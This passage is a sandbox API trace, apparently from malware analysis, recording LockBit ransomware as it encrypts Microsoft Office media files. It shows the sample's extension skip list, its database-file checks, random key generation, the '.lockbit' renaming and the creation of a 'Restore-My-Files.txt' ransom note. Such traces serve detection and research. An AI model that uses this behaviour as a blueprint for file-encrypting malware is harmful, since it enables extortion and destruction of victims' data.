dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0200.844] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.844] malloc (_Size=0x40068) returned 0x3f70048 [0200.844] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=8508) returned 1 [0200.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0200.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0200.845] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0200.849] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.849] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.849] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.850] free (_Block=0x1fa2ed8) [0200.850] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18220_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.850] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.850] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.850] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0346a00, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa0346a00, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x72c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18221_.WMF", cAlternateFileName="")) returned 1 [0200.850] lstrcmpiW (lpString1=".", lpString2="BD18221_.WMF") returned -1 [0200.850] lstrcmpiW (lpString1="..", lpString2="BD18221_.WMF") returned -1 [0200.850] PathFindExtensionW (pszPath="BD18221_.WMF") returned=".WMF" [0200.850] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.850] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.850] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.850] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.851] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.851] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.852] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18221_.WMF") returned 1 [0200.852] lstrcmpiW (lpString1="ntldr", lpString2="BD18221_.WMF") returned 1 [0200.852] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18221_.WMF") returned 1 [0200.852] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18221_.WMF") returned 1 [0200.852] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18221_.WMF") returned -1 [0200.852] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18221_.WMF") returned 1 [0200.852] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18221_.WMF") returned 1 [0200.852] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.853] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF") returned=".WMF" [0200.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.853] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.853] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.854] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.854] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.854] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.854] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.854] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF.lockbit") returned 79 [0200.854] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18221_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0200.858] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.858] malloc (_Size=0x40068) returned 0x3df0008 [0200.858] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1836) returned 1 [0200.858] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0200.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.859] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0200.859] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0200.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.861] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.861] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.862] free (_Block=0x1fa2ed8) [0200.862] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18221_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.862] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.862] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.862] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5a99400, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb5a99400, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x756, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18222_.WMF", cAlternateFileName="")) returned 1 [0200.863] lstrcmpiW (lpString1=".", lpString2="BD18222_.WMF") returned -1 [0200.863] lstrcmpiW (lpString1="..", lpString2="BD18222_.WMF") returned -1 [0200.863] PathFindExtensionW (pszPath="BD18222_.WMF") returned=".WMF" [0200.863] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.863] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.863] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18222_.WMF") returned 1 [0200.864] lstrcmpiW (lpString1="ntldr", lpString2="BD18222_.WMF") returned 1 [0200.864] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18222_.WMF") returned 1 [0200.864] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18222_.WMF") returned 1 [0200.864] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18222_.WMF") returned -1 [0200.864] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18222_.WMF") returned 1 [0200.864] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18222_.WMF") returned 1 [0200.864] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0200.864] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF") returned=".WMF" [0200.864] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.864] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.864] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0200.865] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0200.865] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF.lockbit") returned 79 [0200.865] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18222_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0200.866] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0200.866] malloc (_Size=0x40068) returned 0x1ff1e60 [0200.866] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1878) returned 1 [0200.866] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0200.867] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.867] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.867] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0200.867] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0200.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0200.944] malloc (_Size=0xb4) returned 0x1fa2ed8 [0200.944] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0200.946] free (_Block=0x1fa2ed8) [0200.946] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18222_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0200.946] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0200.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0200.947] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ee4c100, ftCreationTime.dwHighDateTime=0x1bddb92, ftLastAccessTime.dwLowDateTime=0xbcc25d20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x5ee4c100, ftLastWriteTime.dwHighDateTime=0x1bddb92, nFileSizeHigh=0x0, nFileSizeLow=0xc5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18223_.WMF", cAlternateFileName="")) returned 1 [0200.947] lstrcmpiW (lpString1=".", lpString2="BD18223_.WMF") returned -1 [0200.947] lstrcmpiW (lpString1="..", lpString2="BD18223_.WMF") returned -1 [0200.947] PathFindExtensionW (pszPath="BD18223_.WMF") returned=".WMF" [0200.947] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0200.947] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0200.948] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0200.948] lstrcmpiW (lpString1=".spl", 